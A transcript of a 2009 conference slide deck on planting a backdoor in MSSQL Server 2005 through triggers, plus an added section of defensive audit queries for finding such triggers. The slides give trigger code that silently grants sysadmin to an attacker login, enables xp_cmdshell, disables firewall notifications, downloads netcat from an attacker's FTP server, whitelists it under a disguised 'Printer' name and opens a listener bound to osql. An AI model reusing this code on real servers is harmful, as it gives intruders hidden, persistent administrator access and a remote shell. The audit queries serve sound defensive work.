MSSql server 2005 backdoor - PowerPoint PPT Presentation

Provided by: dc23
Learn more at: http://www.dc214.org
Transcript and Presenter's Notes

1
MSSql server 2005 backdoor
  • Duong Ngo
  • October 14, 2009

2
POST-EXPLOITATION
  • Got access to an MSSQL box? (SQL injection, brute
    force)
  • Privileges: sa / dbo / normal user
  • Got all data
  • Now what's next??

3
Backdoors
  • Provide easier access to the compromised box in
    the future
  • Types of backdoors:
  • OS backdoors (rootkits),
  • Web server backdoors (PHPshell,
    CGITelnet..)
  • So how about a database backdoor?? YES!

4
SQL Server 2005 Backdoor
  • We'll create a backdoor based on a SQL Server
    trigger.
  • What's a trigger?

5
Database Trigger
  • Special kind of stored procedure that executes
    automatically when a user attempts the specified
    data-modification statement on the specified
    table (UPDATE, DELETE, INSERT..)
  • A trigger executes under the security context
    of whoever caused it to fire!

6
EXAMPLE: Create trigger
  • Context: normal user with CREATE TRIGGER
    permission
  • CREATE TRIGGER trg_gain_privilege ON
    tblCustomers FOR INSERT, DELETE, UPDATE
  • AS
  • EXEC sp_addsrvrolemember @loginame 'Hacker',
    @rolename N'sysadmin'

7
EXAMPLE: Trigger fired
  • Context: sa (server admin)
  • sa> DELETE FROM tblCustomers
  • RESULT??
  • User 'Hacker' has now become sysadmin

8
What can we do with that?
  • Privilege escalation: normal user -> higher role
  • Database backdoor

9
SQLServer Backdoor features
  • - Execute subsequent commands if current user is
    'sa'
  • - Enable xp_cmdshell
  • - Create new login 'backdoor' and add it to
    sysadmin server role.
  • - Disable firewall notification mode
  • - Add ftp to allowed programs list
  • - Get netcat from attacker ftp server
  • - Create a directory 'Backdoor_activated' on the
    attacker's ftp server to let the attacker know
    whenever the backdoor has been started.
  • - Open netcat in listen mode attached to the SQL
    command-line client osql.

10
Our Backdoor's Code
  • CREATE TRIGGER trg_backdoor ON DATABASE FOR
    DDL_DATABASE_LEVEL_EVENTS
  • AS
  • BEGIN
  • DECLARE @cur_user varchar(200)
  • CREATE LOGIN backdoor WITH PASSWORD
    'Backdoor123'
  • EXEC sys.sp_addsrvrolemember @loginame
    N'Backdoor', @rolename N'sysadmin'
  • --disable firewall notification mode
  • Exec master..xp_cmdshell 'netsh firewall set
    notifications disable'
  • ..

11
Why DDL_DATABASE_LEVEL_EVENTS
  • Because it covers all of the events below:
  • CREATE_TABLE ALTER_TABLE DROP_TABLE CREATE_VIEW
    ALTER_VIEW DROP_VIEW
  • CREATE_SYNONYM DROP_SYNONYM CREATE_FUNCTION
    ALTER_FUNCTION DROP_FUNCTION
  • CREATE_PROCEDURE ALTER_PROCEDURE DROP_PROCEDURE
    CREATE_TRIGGER ALTER_TRIGGER
  • DROP_TRIGGER CREATE_EVENT_NOTIFICATION
    DROP_EVENT_NOTIFICATION
  • .
  • .

12
Our Backdoor's Code (cont.)
  • -- save ftp commands to an external file
  • SET @cmd 'echo GET ' @fileget ' >> '
    @cmdfile
  • ..
  • -- execute ftp with commands loaded from the
    file we created
  • SET @cmd 'ftp -s' @cmdfile
  • EXEC master..xp_cmdshell @cmd, NO_OUTPUT
  • -- After getting netcat, add netcat to the firewall's
    allowedprogram list
  • SET @cmd 'netsh firewall add allowedprogram
    program' @localdir '\' @fileget '
    namePrinter modeENABLE scopeALL profileALL'
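
The triggers described in these slides keep their definitions in the database's catalog views, so an administrator can audit for them. The T-SQL below is an added example, not part of the original presentation; it assumes SQL Server 2005 or later and a principal allowed to read module definitions, and its search strings are taken from the slides.

```sql
-- Added defensive example; not code from the presentation.
-- Assumes SQL Server 2005+ and permission to read module definitions.

-- 1. In the current database: DML triggers and database-level DDL triggers
--    whose body touches logins, server roles or xp_cmdshell, as the slides'
--    triggers do. A NULL definition means WITH ENCRYPTION: review by hand.
SELECT  t.name                   AS trigger_name,
        t.parent_class_desc      AS scope,         -- DATABASE or OBJECT_OR_COLUMN
        OBJECT_NAME(t.parent_id) AS parent_table,  -- NULL for DDL triggers
        t.is_disabled,
        t.create_date,
        t.modify_date
FROM    sys.triggers    AS t
JOIN    sys.sql_modules AS m ON m.object_id = t.object_id
WHERE   t.is_ms_shipped = 0
  AND ( m.definition IS NULL
     OR m.definition LIKE '%sp_addsrvrolemember%'
     OR m.definition LIKE '%xp_cmdshell%'
     OR m.definition LIKE '%CREATE LOGIN%' )
ORDER BY t.modify_date DESC;

-- 2. Every database-level DDL trigger and the events it fires on
--    (a trigger on DDL_DATABASE_LEVEL_EVENTS lists many events here).
SELECT  t.name AS trigger_name, te.type_desc AS fires_on
FROM    sys.triggers       AS t
JOIN    sys.trigger_events AS te ON te.object_id = t.object_id
WHERE   t.parent_class_desc = 'DATABASE'
ORDER BY t.name, te.type_desc;

-- 3. Current members of the sysadmin server role, newest login first.
SELECT  p.name, p.type_desc, p.is_disabled, p.create_date
FROM    sys.server_role_members AS rm
JOIN    sys.server_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN    sys.server_principals   AS p ON p.principal_id = rm.member_principal_id
WHERE   r.name = N'sysadmin'
ORDER BY p.create_date DESC;

-- 4. Whether xp_cmdshell is currently enabled (1 = enabled).
SELECT  name, value_in_use
FROM    sys.configurations
WHERE   name = N'xp_cmdshell';
```

Queries 1 and 2 are scoped to the current database and must be repeated in each one; server-level triggers live in sys.server_triggers and sys.server_sql_modules instead. On a case-sensitive collation the LIKE patterns match only the exact casing shown.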

13
Thank You for listening!!